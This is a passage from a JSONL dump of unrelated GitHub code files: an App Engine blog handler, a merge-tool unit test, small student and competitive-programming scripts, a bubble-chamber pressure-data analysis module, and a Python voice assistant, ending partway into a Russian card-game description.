pagestr,\r\n 'curruser': users.get_current_user()\r\n }\r\n\r\n path = os.path.join(os.path.dirname(__file__), 'template/bloglist.html')\r\n self.response.out.write(template.render(path, template_values))\r\n\r\n\r\n\r\nclass ViewBlog(webapp.RequestHandler):\r\n def get(self,bid): \r\n greeting = db.get(bid)\r\n\r\n replys = db.GqlQuery(\"SELECT * \"\r\n \"FROM LogReply \"\r\n \"WHERE upid = :1 \"\r\n \"ORDER BY date DESC\",bid)\r\n\r\n isCurruser = users.get_current_user() == greeting.author\r\n isAdmin = users.is_current_user_admin()\r\n\r\n logging.debug('isCurruser = %s' % (isCurruser))\r\n logging.debug('isAdmin = %s' % (isAdmin))\r\n \r\n \r\n if isCurruser or isAdmin:\r\n isCanEdit = True\r\n else:\r\n isCanEdit = False\r\n\r\n template_values = {\r\n 'greeting': greeting,\r\n 'replys': replys,\r\n 'isCanEdit': isCanEdit\r\n }\r\n\r\n path = os.path.join(os.path.dirname(__file__), 'template/viewblog.html')\r\n self.response.out.write(template.render(path, template_values))\r\n \r\n# Anybody has the right to write blog~\r\nclass AddBlog(webapp.RequestHandler):\r\n def get(self):\r\n if users.get_current_user() == None :\r\n self.redirect(users.create_login_url(self.request.uri))\r\n \r\n template_values = {}\r\n path = os.path.join(os.path.dirname(__file__), 'template/addblog.html')\r\n self.response.out.write(template.render(path, template_values)) \r\n \r\n def post(self):\r\n greeting = pojo.Greeting()\r\n if users.get_current_user():\r\n greeting.author = users.get_current_user()\r\n greeting.title = self.request.get('title')\r\n greeting.tags = self.request.get('tags').split(' ')\r\n content = self.request.get('content')\r\n greeting.content = content\r\n if content:\r\n greeting.content_converted = text2html(content)\r\n greeting.put()\r\n self.redirect('/')\r\n else :\r\n self.redirect(\"/exception/hasnoright.html\")\r\n\r\n#Anybody who had writed the blog has the right to edit it\r\nclass EditBlog(webapp.RequestHandler):\r\n def get(self,bid):\r\n if users.get_current_user() == None :\r\n self.redirect(users.create_login_url(self.request.uri))\r\n \r\n greeting = db.get(bid)\r\n if users.get_current_user() == greeting.author or users.is_current_user_admin():\r\n template_values = {\r\n 'greeting': greeting,\r\n }\r\n path = os.path.join(os.path.dirname(__file__), 'template/editblog.html')\r\n self.response.out.write(template.render(path, template_values))\r\n else :\r\n self.redirect(\"/exception/hasnoright.html\")\r\n\r\n#Anybody who had writed the blog has the right to update it\r\nclass UpdateBlog(webapp.RequestHandler):\r\n def post(self):\r\n if users.get_current_user() == None :\r\n self.redirect(users.create_login_url(self.request.uri))\r\n \r\n greeting = db.get(self.request.get('key'))\r\n if users.get_current_user() == greeting.author or users.is_current_user_admin():\r\n greeting.title = self.request.get('title')\r\n greeting.tags = self.request.get('tags').split(' ')\r\n greeting.content = self.request.get('content')\r\n \r\n greeting.put()\r\n self.redirect('/')\r\n else:\r\n self.redirect(\"/exception/hasnoright.html\")\r\n \r\n#Anybody who had writed the blog has the right to delete it\r\nclass DeleteBlog(webapp.RequestHandler):\r\n def get(self,bid):\r\n if users.get_current_user() == None :\r\n self.redirect(\"/exception/hasnoright.html\")\r\n \r\n greeting = db.get(bid)\r\n if users.get_current_user() == greeting.author or users.is_current_user_admin():\r\n greeting.delete()\r\n self.redirect('/')\r\n else :\r\n self.redirect(\"/exception/hasnoright.html\")\r\n\r\n\r\n\r\n \r\n\r\napplication = webapp.WSGIApplication([\r\n ('/', MainPage),\r\n (r'/blog/(.*)', ViewBlog),\r\n ('/add', AddBlog),\r\n (r'/edit/(.*)', EditBlog),\r\n ('/update', UpdateBlog),\r\n (r'/delete/(.*)', DeleteBlog) \r\n], debug=True)\r\n\r\n\r\ndef main():\r\n logging.getLogger().setLevel(logging.INFO)\r\n wsgiref.handlers.CGIHandler().run(application)\r\n\r\n\r\nDIR_PATH = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))\r\nEXTRA_PATHS = [\r\n DIR_PATH,\r\n #os.path.join(DIR_PATH, 'utils'),\r\n]\r\nsys.path = EXTRA_PATHS + sys.path\r\nlogging.debug(sys.path)\r\nfrom utils.textconvert import text2html\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"yongboy/yongblog","sub_path":" yongblog --username yongboy/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":5848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8438303035","text":"import os.path\nimport shutil\nfrom unittest.mock import MagicMock, ANY, patch\nfrom importlib import import_module\n\nfrom git import Repo\n\nfrom mergeit.core.push_handler import PushHandler, DEFAULT_REMOTE\nfrom mergeit.core.config.config import Config\nfrom tests.common import MergeitTest\n\n\nREPO_NAME = 'test_repo'\nWORKSPACE = 'fixtures'\n\n\nclass PushHandlerTest(MergeitTest):\n\n def setUp(self):\n super().setUp()\n self.clean_workspace()\n os.mkdir(WORKSPACE)\n commits = [{\"id\": \"ffffff\",\n \"message\": \"Test commit message\\\\n\",\n \"timestamp\": \"2016-01-01T00:00:00+00:00\",\n \"url\": \"http://localhost/test/test_repo/commit/ffffff\",\n \"author\": {\"name\": \"test\",\n \"email\": \"test@localhost\"}}]\n self.config_source_mock = MagicMock()\n self.config_controller = Config(self.config_source_mock)\n self.configure({'name': REPO_NAME,\n 'uri': 'git@localhost:test/{}.git'.format(REPO_NAME)})\n self.repo_manager = MagicMock()\n self.push_handler = PushHandler(self.config_controller, 'master', commits, self.repo_manager)\n\n def tearDown(self):\n super().tearDown()\n self.clean_workspace()\n\n def clean_workspace(self):\n if os.path.exists(WORKSPACE):\n shutil.rmtree(WORKSPACE)\n\n def configure(self, data):\n self.config_controller.data = dict(**data)\n\n def test_init_runners(self):\n with open(os.path.join(WORKSPACE, '__init__.py'), 'w') as f:\n f.write('')\n variables = {'foo': 'world', 'bar': 'hell'}\n # Filter\n filter_module_name = 'test_filter'\n filter_class_name = 'TestFilter'\n with open(os.path.join(WORKSPACE, '{}.py').format(filter_module_name), 'w') as f:\n f.write('from mergeit.core.runner import Filter\\n'\n 'class {}(Filter): pass'.format(filter_class_name))\n\n filter_data = {'module': '{}.{}.{}'.format(WORKSPACE, filter_module_name, filter_class_name)}\n filter_extra = {'extra': 42, 'extra_var': 'hello, {foo}'}\n filter_data.update(filter_extra)\n filter_data_expected = filter_extra.copy()\n filter_data_expected['extra_var'] = filter_data_expected['extra_var'].format(**variables)\n # Hook\n hook_module_name = 'test_hook'\n hook_class_name = 'TestHook'\n with open(os.path.join(WORKSPACE, '{}.py').format(hook_module_name), 'w') as f:\n f.write('from mergeit.core.runner import Hook\\n'\n 'class {}(Hook): pass'.format(hook_class_name))\n hook_data = {'module': '{}.{}.{}'.format(WORKSPACE, hook_module_name, hook_class_name)}\n hook_extra = {'foo': 24, 'extra_info': 'bye, {bar}'}\n hook_data.update(hook_extra)\n hook_data_expected = hook_extra.copy()\n hook_data_expected['extra_info'] = hook_data_expected['extra_info'].format(**variables)\n # Configure\n self.configure({'variables': variables,\n 'filters_def': {filter_module_name: filter_data},\n 'hooks_def': {hook_module_name: hook_data}})\n # Import\n filter_module = import_module('{}.{}'.format(WORKSPACE, filter_module_name))\n filter_class = getattr(filter_module, filter_class_name)\n hook_module = import_module('{}.{}'.format(WORKSPACE, hook_module_name))\n hook_class = getattr(hook_module, hook_class_name)\n\n self.push_handler.init_runners()\n\n filter_ = self.push_handler.filters[filter_module_name]\n hook = self.push_handler.hooks[hook_module_name]\n self.assertIsInstance(filter_, filter_class)\n self.assertIsInstance(hook, hook_class)\n self.assertEqual(filter_.push_handler, self.push_handler)\n self.assertEqual(hook.push_handler, self.push_handler)\n self.assertEqual(filter_.config, filter_data_expected)\n self.assertEqual(hook.config, hook_data_expected)\n\n @patch('mergeit.core.push_handler.import_module')\n def test_process_merge_pair__merge(self, import_mock):\n # self.configure({})\n source_branch = 'master'\n target_branch = 'develop'\n test_filter_class = MagicMock()\n test_hook_class = MagicMock()\n test_filter = test_filter_class()\n test_hook = test_hook_class()\n test_filter.run.return_value = target_branch\n test_hook.run.return_value = target_branch\n test_filter_module = 'test_filter'\n test_hook_module = 'test_hook'\n self.push_handler.filters = {test_filter_module: test_filter}\n self.push_handler.hooks = {test_hook_module: test_hook}\n import_mock(test_filter_module).return_value = test_filter_class\n import_mock(test_hook_module).return_value = test_hook_class\n conflict = MagicMock()\n self.repo_manager.merge = MagicMock(return_value=conflict)\n\n self.push_handler.process_merge_pair(source_branch, target_branch, [test_filter_module], [test_hook_module])\n\n self.repo_manager.merge.assert_called_once_with(source_branch, target_branch)\n test_filter.run.assert_called_once_with(ANY, source_branch, target_branch) # TODO: ANY - regexp match\n test_hook.run.assert_called_once_with(source_branch, target_branch, conflict)\n\n @patch('mergeit.core.push_handler.import_module')\n def test_process_merge_pair__merge_cancel(self, import_mock):\n # self.configure({})\n source_branch = 'master'\n target_branch = 'develop'\n test_filter_class = MagicMock()\n test_hook_class = MagicMock()\n test_filter = test_filter_class()\n test_hook = test_hook_class()\n test_filter.run.return_value = None\n test_hook.run.return_value = target_branch\n test_filter_module = 'test_filter'\n test_hook_module = 'test_hook'\n self.push_handler.filters = {test_filter_module: test_filter}\n self.push_handler.hooks = {test_hook_module: test_hook}\n import_mock(test_filter_module).return_value = test_filter_class\n import_mock(test_hook_module).return_value = test_hook_class\n self.repo_manager.merge = MagicMock()\n\n self.push_handler.process_merge_pair(source_branch, target_branch, [test_filter_module], [test_hook_module])\n\n self.repo_manager.merge.assert_not_called()\n test_filter.run.assert_called_once_with(ANY, source_branch, target_branch) # TODO: ANY - regexp match\n test_hook.run.assert_not_called()\n\n def test_handle(self):\n source_branch = 'master'\n target_branch = 'develop'\n self.configure({'dependencies': {'^{}$'.format(source_branch): {'targets': [target_branch]}}})\n self.push_handler.process_merge_pair = MagicMock()\n\n self.push_handler.handle()\n\n self.push_handler.process_merge_pair.assert_called_once_with(ANY, target_branch, [], []) # FIXME: pass filters and hooks\n\n def test_handle__variables(self):\n source_version = '3\\\\.0'\n target_version = '4\\\\.0'\n source_branch = 'v{source_version}'\n target_branch = 'v{target_version}'\n self.push_handler.branch = 'v3.0'\n self.configure({'dependencies': {'^{}$'.format(source_branch): {'targets': [target_branch]}},\n 'variables': {'source_version': source_version,\n 'target_version': target_version}})\n self.push_handler.process_merge_pair = MagicMock()\n\n self.push_handler.handle()\n\n self.push_handler.process_merge_pair.assert_called_once_with(ANY, target_branch.format(target_version=target_version), [], []) # FIXME: pass filters and hooks\n","repo_name":"insolite/mergeit","sub_path":"tests/test_core/test_push_handler.py","file_name":"test_push_handler.py","file_ext":"py","file_size_in_byte":7700,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"36487239291","text":"# Activity: Python 1 Post Activity\n# File: Py1_PA_Task1_katherto.py\n# Date: September 17, 2015\n# By: Kathryn Atherton\n# katherto\n# Section: 4\n# Team: 59\n#\n# ELECTRONIC SIGNATURE\n# Kathryn Atherton\n# The electronic signature above indicates that the program \n# submitted for evaluation is my individual work. I have\n# a general understanding of all aspects of its development\n# and execution.\n#\n# This program demonstrates the equivalence between doing \n# calculations with decimal numbers and doing the same\n# calculations with fractions. It generates two random \n# numbers, rounds them to the nearest tenth, adds them\n# together, converts the numbers to fractions, and adds \n# them together.\n\nfrom random import uniform\nfrom fractions import Fraction\n\na = uniform(0,10)\nb = uniform(0,10)\n\nc = round(a,1)\nd = round(b,1)\n\ndecimal = c + d\n\ne = Fraction(c)\nf = Fraction(d)\n\nfraction = e + f\n\nprint('First Random Number:', a)\nprint('Second Random Number:', b)\n\nprint(c, '+', d, '=', decimal)\nprint(e, '+', f, '=', fraction)","repo_name":"class-archives/ENGR-141","sub_path":"Fall-2015/Post-Activities/Python-1/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15607526642","text":"import pyttsx3 # text to speech\r\nimport speech_recognition as sr # speech to text \r\nimport wikipedia\r\nimport webbrowser #for search\r\nimport requests\r\nimport datetime\r\nimport pyjokes\r\nimport playsound\r\nfrom gtts import gTTS #text into audio\r\nimport os # to interact with operating system\r\nimport wolframalpha # to calculate expertlevel answers\r\nfrom selenium import webdriver #automates web browsers\r\ndef speak(audio):\r\n engine = pyttsx3.init(\"sapi5\")\r\n voices = engine.getProperty(\"voices\")\r\n engine.setProperty('voice', voices[1].id)# 1 for female and 0 for male voice\r\n rate=engine.getProperty('rate')\r\n engine.setProperty('rate',150)\r\n engine.say(audio)\r\n engine.runAndWait()\r\n\r\ndef sptext():\r\n r= sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Listening...\")\r\n r.pause_threshold =1 \r\n audio = r.listen(source)\r\n try:\r\n print(\"Recognizing...\")\r\n data = r.recognize_google(audio, language='en-in')\r\n print(\"User said:\" + data + \"\\n\")\r\n except Exception as e:\r\n print(e)\r\n speak(\"I didnt understand\")\r\n return \"None\"\r\n return data\r\n\r\nif __name__ == \"__main__\":\r\n speak(\"Voice Assistance Activated \")\r\n speak(\"How can i help you\")\r\n while True:\r\n data= sptext().lower()\r\n if 'wikipedia' in data:\r\n speak(\"Searching Wikipedia ...\")\r\n data= data.replace(\"wikipedia\", '')\r\n results = wikipedia.summary(data, sentences=2)\r\n speak(\"According to wikipedia\")\r\n speak(results)\r\n elif ' Who are you' in data:\r\n speak(\"Hello I am Najiya\")\r\n elif 'open youtube' in data:\r\n speak(\"opening youtube\")\r\n webbrowser.open(\"youtube.com\")\r\n elif 'open google' in data:\r\n speak(\"opening google\")\r\n webbrowser.open(\"google.com\")\r\n elif 'open stackoverflow' in data:\r\n speak(\"opening stackoverflow\")\r\n webbrowser.open(\"stackoverflow.com\")\r\n elif 'open spotify' in data:\r\n speak(\"opening spotify\")\r\n webbrowser.open(\"spotify.com\")\r\n elif 'open whatsapp' in data:\r\n speak(\"opening whatsapp\")\r\n loc = \"C:\\\\Users\\\\jaspr\\\\AppData\\\\Local\\\\WhatsApp\\\\WhatsApp.exe\"\r\n os.startfile(loc)\r\n elif 'play music' in data:\r\n speak(\"opening music\")\r\n webbrowser.open(\"spotify.com\")\r\n elif 'play music' in data:\r\n speak(\"opening music\")\r\n webbrowser.open(\"spotify.com\")\r\n elif 'local disk d' in data:\r\n speak(\"opening local disk D\")\r\n webbrowser.open(\"D://\")\r\n elif 'local disk c' in data:\r\n speak(\"opening local disk C\")\r\n webbrowser.open(\"C://\")\r\n elif 'local disk e' in data:\r\n speak(\"opening local disk E\")\r\n webbrowser.open(\"E://\")\r\n elif 'joke' in data:\r\n speak(\"Opening joke\")\r\n joke_1=pyjokes.get_joke(language=\"en\",category=\"netural\")\r\n print(joke_1)\r\n elif 'notepad' in data:\r\n speak(\"Opening Notepad\")\r\n webbrowser.open(\"Notepad://\")\r\n elif 'now time' in data:\r\n speak(\"Current Time is\")\r\n time=datetime.datetime.now()\r\n print(time)\r\n elif 'exit' in data:\r\n speak(\"Thank you...\")\r\n break\r\n \r\n","repo_name":"Najo2311/Voice_Assistant","sub_path":"Voice Assistant using Python/mini_python.py","file_name":"mini_python.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16169233555","text":"# 프로그래머스 코딩테스트 연습문제 - python\n\n### 체감 난이도: 1\n### list 활용\n### https://school.programmers.co.kr/learn/courses/30/lessons/120904?language=python3\n\ndef solution(num, k):\n num_lst = list(map(int, str(num)))\n \n try:\n return num_lst.index(k) + 1\n except:\n return -1","repo_name":"Paul-scpark/Coding-test","sub_path":"programmers/python/1_숫자찾기.py","file_name":"1_숫자찾기.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24170192011","text":"import io\nimport sys\n#sys.setrecursionlimit(10**7)\nfrom collections import deque,defaultdict\nfrom heapq import heappush,heappop \nfrom itertools import product,combinations,accumulate\nfrom bisect import bisect_right,bisect_left\ndef input(): return sys.stdin.readline().strip()\ndef INT(): return int(input())\ndef MAP(): return map(int,input().split())\ndef LIST(): return list(map(int,input().split()))\nINF = float('inf')\nimport math\ndirc = [(0,1),(0,-1),(1,0),(-1,0)]\n#dirc2 = [(0,1),(0,-1),(1,0),(-1,0),(-1,-1),(-1,1),(1,-1),(1,1)]\n#mod = 10**9+7\n#mod = 998244353\n#--------------------------------------------------------------\n_INPUT = \"\"\"\\\n6 7\n1 2 5\n1 4 4\n2 3 4\n2 5 7\n3 6 3\n4 5 3\n5 6 5\n\n\"\"\"\nsys.stdin = io.StringIO(_INPUT)\n#--------------------------------------------------------------\n\"\"\"\n<考察>\n\n<キーワード>\n・最大フロー、最小カットについて\nフロー:ある場所からある場所まで運んだ荷物の量\n・残余ネットワーク:あとフローをどれだけ追加でき、どれだけ戻すことができるかを重みつき有向グラフで著したもの\n(逆向きにグラフを貼ればよい)\n・フロ- a->b (3/8)あと5だけ流せる、3戻すことも可能\n・残余ネットワーク a->b(5) b->a (3)\n\n<ポイント>\n最大フローのアルゴリズムについて\n1.残余ネットワークでsからtまで辿れるような道を適当に見つけ、その道に流せるだけのフローを流す\n2.その際に、残余ネットワークの辺の重みを書き換えるのを忘れないように\n3.1,2を繰り返し、sからtまで流せる道がなくなった時のフローが最大フローになる\n\nなぜこのアルゴリズムで成り立つか\n->残余ネットワークを考えることにより、仮に、先に追加した増大道が邪魔したとしても\n逆向きの辺(押し戻す部分)を張っていることにより、正しく最大フローを求められる。\n\n・計算量について\nDinicのアルゴリズムはO(M*N^2)\nフォールドファーカーソンO(|最大フローf|*|M|)\n\n<おまけ>\n・無向グラフの時->双方向に辺を張る\n・複数始点、複数終点がある時、新たな始点、終点を一つ用意してそれらにつなぐ\n(このような考え方は重要,但し、始点と終点のペアが決まっているときはNP完全)\n・最大流の答え=最小カットの値\n・最小カットとは:頂点1からNまで到達できないようにするのに、最小で何円を使う必要があるか\n\"\"\"\n#--------------------------------------------------------------\nfrom collections import deque\nclass FlowGraph:\n '''流量(フロー)を扱うグラフ\n 実装済み:\n ・最大流1 flow1() O(|E||V|^2)\n '''\n def __init__(self, N):\n '''初期化 FlowGraph(頂点数)\n 使い方:\n 平面座標を扱うときは (i, j) → i * W + j 等で整数に変換する\n Args:\n N (int): 頂点数\n Returns:\n void\n '''\n self.n = N # 頂点数\n self.edges = [[] for i in range(N)] # 辺の情報\n self.pos = [] # 辺の番号 (From, edges[From]内の辺情報の位置)\n def addEdge(self, From, To, cap=1):\n '''辺の追加 addEdge(始点, 終点, 容量)\n Args:\n From (int): 始点の番号\n To (int): 終点の番号\n cap (int?): 辺の容量, 初期値 1\n Returns:\n int: 辺の番号\n '''\n assert 0 <= From < self.n\n assert 0 <= To < self.n\n assert 0 <= cap\n m = len(self.pos)\n self.pos.append((From, len(self.edges[From])))\n self.edges[From].append({'to':To, 'cap':cap, 'rev':len(self.edges[To])})\n self.edges[To].append({'to':From, 'cap':0, 'rev':len(self.edges[From])-1})\n return m\n\n def getEdge(self, i):\n '''辺情報の取得 getEdge(辺番号)\n Args:\n i (int): 辺の番号\n Returns:\n dict: 辺の情報 {'from':始点,\n 'to':終点,\n 'cap':容量,\n 'flow':流量}\n '''\n m = len(self.pos)\n assert 0 <= i < m\n e = self.edges[self.pos[i][0]][self.pos[i][1]]\n reve = self.edges[e['to']][e['rev']]\n return {'from':self.pos[i][0],\n 'to':e['to'],\n 'cap':e['cap'] + reve['cap'],\n 'flow':reve['cap']}\n\n def getGraph(self):\n '''全ての辺の情報を取得\n Returns:\n list: i番目の辺のdict\n '''\n res = []\n for i in range(len(self.pos)):\n res.append(self.getEdge(i))\n return res\n\n def changeEdge(self, i, cap, flow):\n '''辺の流量を変更する changeEdge(辺番号, 新容量, 新流量)\n Args:\n i (int): 変更する辺の番号\n cap (int?): 変更後の容量\n flow (int?): 変更後の流量\n Returns:\n void\n '''\n m = len(self.pos)\n assert 0 <= i < m\n assert 0 <= flow <= cap\n e = self.edges[self.pos[i][0]][self.pos[i][1]]\n reve = self.edges[e['to']][e['rev']]\n e['cap'] = cap - flow\n reve['cap'] = flow\n\n def flow1(self, st, gl, flowlimit=(1<<63)-1):\n '''最大流を求める flow(始点, 終点, 流量の上限) O(|E||V|^2)\n Args:\n st (int): 始点の番号\n gl (int): 終点の番号\n flowlimit (int?): 流量の上限 初期値は64bit整数最大値\n Returns:\n int?: 最大の流量\n '''\n assert 0 <= st < self.n\n assert 0 <= gl < self.n\n dist = [0] * self.n # stからの距離\n iter = [0] * self.n #\n q = deque()\n\n def bfs(): # stからの距離を求めておく\n for i in range(self.n):\n dist[i] = -1\n dist[st] = 0\n q = deque()\n q.append(st)\n while q:\n now = q.popleft()\n for e in self.edges[now]:\n if e['cap'] == 0 or dist[e['to']] >= 0:\n continue\n dist[e['to']] = dist[now] + 1\n q.append(e['to'])\n\n def dfs(func, v, f): # v → gl に流せる f\n if v == gl:\n return f\n while iter[v] < len(self.edges[v]):\n e = self.edges[v][iter[v]]\n if e['cap'] > 0 and dist[v] < dist[e['to']]:\n d = func(func, e['to'], min(f, e['cap']))\n if d > 0:\n self.edges[v][iter[v]]['cap'] -= d\n self.edges[e['to']][e['rev']]['cap'] += d\n return d\n iter[v] += 1\n return 0\n\n flow = 0\n while flow < flowlimit:\n bfs()\n if dist[gl] < 0:\n return flow\n iter = [0] * self.n\n f = 0\n while True:\n f = dfs(dfs, st, flowlimit-flow)\n if f <= 0:\n break\n flow += f\n return flow\n \n \nN,M = MAP()\nf = FlowGraph(N)\nfor _ in range(M):\n a,b,c = MAP()\n a,b = a-1,b-1\n f.addEdge(a,b,c)\nprint(f.flow1(0,N-1))","repo_name":"kaichan1224/Atcoder","sub_path":"グラフ問題/最大流問題/A68.py","file_name":"A68.py","file_ext":"py","file_size_in_byte":7345,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16141332870","text":"# Author: Trent Cwiok\n#\n# The purpose of this program is to, given a file name containing\n# data collected from the instruments attached to the bubble chamber,\n# create a data structure capable of storing the instruments and\n# their readouts. The information for any given instrument should\n# then be easily accessible and printable. Additional functionality\n# for plotting any given instrument readout versus time is also\n# included.\n\n# import pdb\nimport numpy as np\n# import matplotlib.pyplot as plt\n# import SBCcode as sbc\n\n\n#np.set_printoptions(threshold=np.nan)\n\n\ndef DataTrim(dictionary, instrument):\n '''\n Given a dictionary constaining instrument data, it uses\n TriggerLatch to trim away unwanted data points where the\n trigger is not latched\n '''\n tick = 0\n\n instrument = str(instrument)\n for i in range(len(dictionary['TriggerLatch'])):\n if dictionary['TriggerLatch'][i] == 0:\n tick = tick + 1\n trim_PT = np.zeros(tick)\n trim_time = np.zeros(tick)\n track = 0\n if instrument in dictionary:\n for value in range(len(dictionary[instrument])):\n if dictionary['TriggerLatch'][value] == 0:\n trim_PT[track] = dictionary[instrument][value]\n trim_time[track] = dictionary['elapsed_time'][value]\n track = track + 1\n\n return trim_PT\n\n# DataTrim(d,'PT4')\n\n\ndef TrimAll(dictionary):\n\n d = {}\n for i in range(1, 10):\n index = str(i)\n d.update({'trimPT' + str(i): DataTrim(dictionary, 'PT' + index)})\n return d\n\n\ndef ShowIndex(dictionary):\n for key in dictionary:\n print(key + str(dictionary[key].shape) + str(dictionary[key].dtype))\n\n\ndef Pbin(dictionary, instrument, edge):\n '''\n sort pressures into bins of 1 psi\n '''\n if instrument in dictionary:\n Bin = np.histogram(dictionary[instrument],\n bins=edge, range=(edge[0], edge[-1]))\n else:\n Bin = np.histogram(np.float64([0]) + np.nan,\n bins=edge, range=(edge[0], edge[-1]))\n BinTime = np.zeros(len(Bin[0]))\n for i in range(len(Bin[0])):\n x = Bin[0][i] * 0.005\n BinTime[i] = x\n dictionary.update({'Bin' + instrument: Bin[1],\n 'Count' + instrument: Bin[0],\n 'BinTime' + instrument: BinTime})\n '''\n print Bin\n plt.hist(dictionary[instrument], bins=step)\n plt.show()\n '''\n return\n\n\ndef BinAll(dictionary, edge):\n for i in range(1, 10):\n index = str(i)\n Pbin(dictionary, 'trimPT' + index, edge)\n return\n\n\ndef tGood(dictionary, instrument='PT4'):\n Pgood = np.float64(0)\n tg = np.float64(0)\n\n for i in range(1, len(dictionary[instrument])):\n if abs(dictionary[instrument][i] -\n dictionary['PressureSetpoint'][i]) <= 0.3:\n Pgood = Pgood + 1\n tg = tg + ((dictionary['elapsed_time'][i] -\n dictionary['elapsed_time'][i - 1]))\n return tg\n\n\ndef tEvent(dictionary):\n Tevent = np.float64(0)\n dt = np.diff(dictionary['elapsed_time'][0:2])\n Tevent = np.sum(dictionary['TriggerLatch'] == 0) * dt\n\n latch_lowtohigh = np.nonzero(np.diff(dictionary['TriggerLatch']) == 1)\n time_of_compression = dictionary['elapsed_time'][latch_lowtohigh[-1]]\n\n return Tevent\n\n\ndef Pevent(dictionary, instrument):\n latch_lowtohigh = np.nonzero(np.diff(dictionary['TriggerLatch']) == 1)[0]\n pressure_of_compression = np.float64(0) + np.nan\n if instrument in dictionary and \\\n latch_lowtohigh.shape[0] > 0 and \\\n latch_lowtohigh[-1] >= 40:\n pressure_of_compression = \\\n dictionary[instrument][latch_lowtohigh[-1] - 40]\n\n return pressure_of_compression\n\n\ndef PumpActiveTime(dictionary):\n tPumpPre = np.float64(0)\n tPumpPost = np.float64(0)\n if 'PUMP' in dictionary:\n for i in range(1, int(len(dictionary['PUMP']) / 2)):\n if dictionary['PUMP'][i] == 1:\n tPumpPre = tPumpPre + ((dictionary['elapsed_time'][i] -\n dictionary['elapsed_time'][i - 1]))\n for i in range(int(len(dictionary['PUMP']) / 2), len(dictionary['PUMP'])):\n if dictionary['PUMP'][i] == 1:\n tPumpPost = tPumpPost + ((dictionary['elapsed_time'][i] -\n dictionary['elapsed_time'][i - 1]))\n tPump = np.array([tPumpPre, tPumpPost], dtype=np.float64)\n return tPump\n\n\ndef PumpActiveCycle(dictionary):\n CycleCountPre = np.int32(0)\n CycleCountPost = np.int32(0)\n if 'PUMPcycles' in dictionary:\n for i in range(1, len(dictionary['PUMPcycles']) / 2):\n dC = dictionary['PUMPcycles'][i] - dictionary['PUMPcycles'][i - 1]\n if dC > 0:\n CycleCountPre = CycleCountPre + dC\n for i in range(len(dictionary['PUMPcycles']) / 2,\n len(dictionary['PUMPcycles'])):\n dC = dictionary['PUMPcycles'][i] - dictionary['PUMPcycles'][i - 1]\n if dC > 0:\n CycleCountPost = CycleCountPost + dC\n CycleCount = np.array([CycleCountPre, CycleCountPost], dtype=np.int32)\n return CycleCount\n\n\ndef atTime(dictionary, time, instrument):\n index = 0\n while time >= dictionary['elapsed_time'][index]:\n index = index + 1\n if time == dictionary['elapsed_time'][index - 1]:\n return dictionary[instrument][index - 1]\n else:\n x = (dictionary[instrument][index] +\n dictionary[instrument][index - 1]) / 2\n print(index)\n return x\n\n\ndef Tdata(dictionary, instrument):\n Tmin = np.float64(0) + np.nan\n Tmax = np.float64(0) + np.nan\n Tavg = np.float64(0) + np.nan\n if instrument in dictionary:\n Tmin = min(dictionary[instrument])\n Tmax = max(dictionary[instrument])\n Tavg = np.mean(dictionary[instrument])\n return (Tmin, Tavg, Tmax)\n\n\ndef main(dictionary, edge=np.cumsum(np.ones(88)) - 1, targetPT='PT4'):\n ## Issues: The 88 above should be dynamically selected to match what len(temp[\"BinTimetrimPT1\"]) evaluated to\n ## below. This will work *for now*...\n\n default_output = {'PumpActiveCycle': np.zeros(2, dtype=np.int32),\n 'PumpActiveTime': np.zeros(2, dtype=np.float64),\n 'TempData': np.zeros((8, 3), dtype=np.float64),\n 'tEvent': np.zeros(1, dtype=np.float64),\n 'tGood': np.zeros(1, dtype=np.float64),\n 'PressureBins': np.zeros((9, len(edge) - 1), dtype=np.float64),\n 'PressureEdge': edge,\n 'EventPressure':np.zeros(9, dtype=np.float64)}\n try:\n temp = TrimAll(dictionary['slowDAQ'])\n BinAll(temp, edge)\n TempData = np.ndarray(shape=(8, 3), dtype=float, order='C')\n for i in range(1, 9):\n TempData[i - 1] = Tdata(dictionary['slowDAQ'], 'T' + str(i))\n PBins = np.ndarray(shape=(9, len(temp['BinTimetrimPT1'])),\n dtype=float, order='C')\n for i in range(1, 10):\n PBins[i - 1] = temp['BinTimetrimPT' + str(i)]\n PressData = np.zeros(9)\n for i in range(1, 10):\n PressData[i - 1] = Pevent(dictionary['slowDAQ'], 'PT' + str(i))\n PAC = PumpActiveCycle(dictionary['slowDAQ'])\n PAT = PumpActiveTime(dictionary['slowDAQ'])\n EventTime = tEvent(dictionary['slowDAQ'])\n GoodTime = tGood(dictionary['slowDAQ'], targetPT)\n DataTrim = {'PumpActiveCycle': PAC,\n 'PumpActiveTime': PAT,\n 'TempData': TempData,\n 'tEvent': EventTime,\n 'tGood': GoodTime,\n 'PressureBins': PBins,\n 'PressureEdge': temp['Bintrim'+targetPT],\n 'EventPressure': PressData}\n # print(ShowIndex(DataTrim))\n # print(DataTrim['PressureBins'])\n return DataTrim\n except:\n return default_output\n","repo_name":"SBC-Collaboration/SBC-Analysis","sub_path":"AnalysisModules/PTData.py","file_name":"PTData.py","file_ext":"py","file_size_in_byte":8008,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"1163967012","text":"'''\nИгра моделирует выбор каждым из двух играющих «наугад» по одной карте из полного\nнабора игральных карт, включающего четыре масти («пики», «трефы», «бубны» и\n«червы») и по 9 достоинств карт в каждой масти («шестерка», «семерка»,\n«восьмерка», «девятка», «десятка», «валет», «дама», «король», «туз»), и\nопределение того из участников игры, у которого выбранная карта «старше». При\nэтом условимся, что приведенный выше перечень мастей и карт одной масти дан в\nпорядке увеличения 